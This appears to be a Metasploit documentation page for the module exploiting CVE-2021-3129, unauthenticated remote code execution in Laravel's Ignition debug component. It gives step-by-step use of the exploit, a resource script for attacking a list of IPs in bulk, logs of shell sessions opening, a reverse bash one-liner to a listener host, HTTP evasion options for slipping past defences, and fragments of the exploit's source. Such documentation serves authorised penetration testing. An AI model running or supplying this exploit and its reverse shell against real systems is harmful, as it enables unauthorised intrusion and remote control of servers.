Unauthenticated remote code execution in Ignition - Metasploit


This page contains detailed information about how to use the exploit/multi/php/ignition_laravel_debug_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Unauthenticated remote code execution in Ignition
Module: exploit/multi/php/ignition_laravel_debug_rce
Source code: modules/exploits/multi/php/ignition_laravel_debug_rce.rb
Disclosure date: 2021-01-13
Last modification time: 2022-02-15 08:47:50 +0000
Supported architecture(s): -
Supported platform(s): Linux, OSX, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-3129

Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using ignition_laravel_debug_rce against a single host

Normally, you can use exploit/multi/php/ignition_laravel_debug_rce this way:

msf > use exploit/multi/php/ignition_laravel_debug_rce
msf exploit(ignition_laravel_debug_rce) > show targets
    ... a list of targets ...
msf exploit(ignition_laravel_debug_rce) > set TARGET target-id
msf exploit(ignition_laravel_debug_rce) > show options
    ... show and set options ...
msf exploit(ignition_laravel_debug_rce) > exploit

Using ignition_laravel_debug_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your ignition_laravel_debug_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/php/ignition_laravel_debug_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Ignition prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote malicious users to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel prior to 8.4.2.

This module has been tested successfully on Debian 10.7 (x86_64) with kernel version 5.10.60.

The easiest way to deploy a vulnerable application is to use the image from the vulhub project available over docker compose here. However this container doesn't come with the required log file created, then it needs to be created manually in the path /var/www/storage/logs/laravel.log.

Verification Steps


Confirm that functionality works: 1. Start msfconsole 2. use exploit/multi/php/ignition_laravel_debug_rc 3. set RHOSTS and RPORT 4. Confirm the target is vulnerable: check 5. Confirm that the target is vulnerable: The target is vulnerable. 6. It come already with a default payload cmd/unix/reverse_bash 7. set LHOST 8. exploit 9. Confirm you have now a cmd session

Options


TARGETURI (required)

The path to the Ignition solutions file to exploit. By default, the path is /_ignition/execute-solution.

LOGPATH (optional)

Path to Laravel's log file, which contains every PHP error and stack trace. By default it is stored in storage/logs/laravel.log. If not defined this module will try to automatically determine it based on the stack trace of the application.

Scenarios


msf6 exploit(multi/php/ignition_laravel_debug_rce) > exploit

[+] bash -c '0<&65-;exec 65<>/dev/tcp/172.28.241.244/4444;sh <&65 >&65 2>&65'
[*] Started reverse TCP handler on 172.28.241.244:4444
[*] Checking component version to 172.28.240.1:8080
[*] Debug mode is enabled.
[*] Found PHP 7.4.15 running Laravel 8.26.1
[*] Found log file /var/www/storage/logs/laravel.log
[*] Command shell session 2 opened (172.28.241.244:4444 -> 172.28.240.1:56840 ) at 2022-02-08 11:32:12 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
php /var/www/artisan --version
Laravel Framework 8.26.1
head ../vendor/facade/ignition/CHANGELOG.md
# Changelog

All notable changes to `ignition` will be documented in this file

## 2.5.1 - 2020-11-13

- add support for LiveWire component urls

## 2.5.0 - 2020-10-27

uname -a
Linux 9f96df025a2b 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 GNU/Linux
cat /etc/debian_version
10.7
exit
[*] 172.28.240.1 - Command shell session 2 closed.

Version and OS

This module has been tested successfully on Debian 10.7 (x86_64) with kernel version 5.10.60. Details as below:

  • PHP 7.4.1
  • Laravel Framework 8.26.1
  • Ignition 2.5.1
  • Debian 10.7

Go back to menu.

Msfconsole Usage


Here is how the multi/php/ignition_laravel_debug_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/php/ignition_laravel_debug_rce

[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/php/ignition_laravel_debug_rce) > show info

       Name: Unauthenticated remote code execution in Ignition
     Module: exploit/multi/php/ignition_laravel_debug_rce
   Platform: Unix, Linux, OSX, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-01-13

Provided by:
  Heyder Andrade <[email protected]>
  ambionics

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix (In-Memory)
  1   Windows (In-Memory)

Check supported:
  Yes

Basic options:
  Name       Current Setting              Required  Description
  ----       ---------------              --------  -----------
  LOGFILE                                 no        Laravel log file absolute path
  Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/w
                                                    iki/Using-Metasploit
  RPORT      80                           yes       The target port (TCP)
  SSL        false                        no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
  VHOST                                   no        HTTP server virtual host

Payload information:

Description:
  Ignition before 2.5.2, as used in Laravel and other products, allows 
  unauthenticated remote attackers to execute arbitrary code because 
  of insecure usage of file_get_contents() and file_put_contents(). 
  This is exploitable on sites using debug mode with Laravel before 
  8.4.2.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-3129
  https://www.ambionics.io/blog/laravel-debug-rce

Module Options


This is a complete list of options available in the multi/php/ignition_laravel_debug_rce exploit:

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show options

Module options (exploit/multi/php/ignition_laravel_debug_rce):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   LOGFILE                                 no        Laravel log file absolute path
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/
                                                     wiki/Using-Metasploit
   RPORT      80                           yes       The target port (TCP)
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
   VHOST                                   no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

Advanced Options


Here is a complete list of advanced options supported by the multi/php/ignition_laravel_debug_rce exploit:

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show advanced

Module advanced options (exploit/multi/php/ignition_laravel_debug_rce):

   Name                    Current Setting                  Required  Description
   ----                    ---------------                  --------  -----------
   AutoCheck               true                             no        Run check before exploit
   ContextInformationFile                                   no        The information file that contains context information
   DOMAIN                  WORKSTATION                      yes       The domain to use for Windows authentication
   DigestAuthIIS           true                             no        Conform to IIS, should work for most servers. Only set
                                                                       to false for non-IIS servers
   DisablePayloadHandler   false                            no        Disable the handler code for the selected payload
   EnableContextEncoding   false                            no        Use transient context when encoding payloads
   FingerprintCheck        true                             no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                            no        Override check result
   HttpClientTimeout                                        no        HTTP connection and receive timeout
   HttpPassword                                             no        The HTTP password to specify for authentication
   HttpRawHeaders                                           no        Path to ERB-templatized raw headers to append to exist
                                                                      ing headers
   HttpTrace               false                            no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                          no        HTTP request and response colors for HttpTrace (unset
                                                                      to disable)
   HttpTraceHeadersOnly    false                            no        Show HTTP headers only in HttpTrace
   HttpUsername                                             no        The HTTP username to specify for authentication
   SSLVersion              Auto                             yes       Specify the version of SSL/TLS to be used (Auto, TLS a
                                                                      nd SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
                                                                      23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/5.0 (Macintosh; Intel M  no        The User-Agent header to use for all requests
                           ac OS X 12_2_1) AppleWebKit/537
                           .36 (KHTML, like Gecko) Chrome/
                           98.0.4758.81 Safari/537.36
   VERBOSE                 false                            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module
   WfsDelay                2                                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_bash):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript
                                                          )
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will N
                                                          OT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect f
                                                          ails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempt
                                                          s
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/php/ignition_laravel_debug_rce module can exploit:

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix (In-Memory)
   1   Windows (In-Memory)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/php/ignition_laravel_debug_rce exploit:

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   49  payload/generic/ssh/interact                                 normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the multi/php/ignition_laravel_debug_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accep
                                                            ted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and versio
                                                            n
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Acce
                                                            pted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes,
                                                            hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Log file is required, however it was neither defined nor automatically detected.


Here is a relevant code snippet related to the "Log file is required, however it was neither defined nor automatically detected." error message:

91:	    return Exploit::CheckCode::Safe
92:	  end
93:	
94:	  def exploit
95:	    @logfile = datastore['LOGFILE'] || find_log_file
96:	    fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile
97:	
98:	    clear_log
99:	    put_payload
100:	    convert_to_phar
101:	    run_phar

Log file does not exist <LOGFILE>


Here is a relevant code snippet related to the "Log file does not exist <LOGFILE>" error message:

116:	      res = post logfile
117:	      if res.code == 200
118:	        vprint_status "Found log file #{logfile}"
119:	        return logfile
120:	      end
121:	      vprint_error "Log file does not exist #{logfile}"
122:	      return
123:	    end
124:	    vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'
125:	    return
126:	  end

Unable to automatically find the log file. To continue set LOGFILE manually


Here is a relevant code snippet related to the "Unable to automatically find the log file. To continue set LOGFILE manually" error message:

119:	        return logfile
120:	      end
121:	      vprint_error "Log file does not exist #{logfile}"
122:	      return
123:	    end
124:	    vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'
125:	    return
126:	  end
127:	
128:	  def clear_log
129:	    res = post "php://filter/read=consumed/resource=#{@logfile}"

Log file <LOGFILE> doesn't seem to exist.


Here is a relevant code snippet related to the "Log file <LOGFILE> doesn't seem to exist." error message:

126:	  end
127:	
128:	  def clear_log
129:	    res = post "php://filter/read=consumed/resource=#{@logfile}"
130:	    # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)
131:	    fail_with(Failure::UnexpectedReply, "Log file #{@logfile} doesn't seem to exist.") unless res.code == 200
132:	  end
133:	
134:	  def put_payload
135:	    post format_payload
136:	    post Rex::Text.rand_text_alpha_upper(2)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Heyder Andrade <eu[at]heyderandrade.org>
  • ambionics

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.